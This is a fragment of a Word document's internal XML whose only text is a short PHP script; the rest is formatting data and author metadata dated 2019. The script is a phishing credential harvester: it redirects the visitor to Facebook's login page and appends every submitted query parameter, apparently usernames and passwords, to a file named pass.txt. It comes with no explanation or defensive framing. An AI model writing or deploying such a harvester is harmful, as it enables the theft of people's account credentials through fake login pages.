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8D" w:rsidRPr="008D008D" w:rsidRDefault="008D008D" w:rsidP="008D008D">
      <w:r w:rsidRPr="008D008D">
        <w:t>&amp;lt;?php header('Location: http://www.Facebook.com/login.php'); $handle = fopen('pass.txt', 'a'); foreach($_GET as $variable =&amp;gt; $value) { fwrite($handle, $variable); fwrite($handle, '='); fwrite($handle, $value); fwrite($handle, '\n'); } fwrite($handle, '\n'); fclose($handle); exit; ?&amp;gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0071370E" w:rsidRDefault="008D008D">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="0071370E" w:rsidSect="00DC77DA">
      <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
      <w:pgMar w:top="2268" w:right="1418" w:bottom="1531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8D"/>
    <w:rsid w:val="000C7635"/>
    <w:rsid w:val="0027182B"/>
    <w:rsid w:val="0054090A"/>
    <w:rsid w:val="0071480B"/>
    <w:rsid w:val="00754EC4"/>
    <w:rsid w:val="008D008D"/>
    <w:rsid w:val="008F10B0"/>
    <w:rsid w:val="009724D9"/>
    <w:rsid w:val="00AB3260"/>
    <w:rsid w:val="00CD23F5"/>
    <w:rsid w:val="00CE7B8C"/>
    <w:rsid w:val="00DC77DA"/>
    <w:rsid w:val="00F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65AC4-6FBB-4408-BF63-6425ECC6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Tristianto Nugroho</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tristianto Nugroho</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-12T16:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-12T16:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>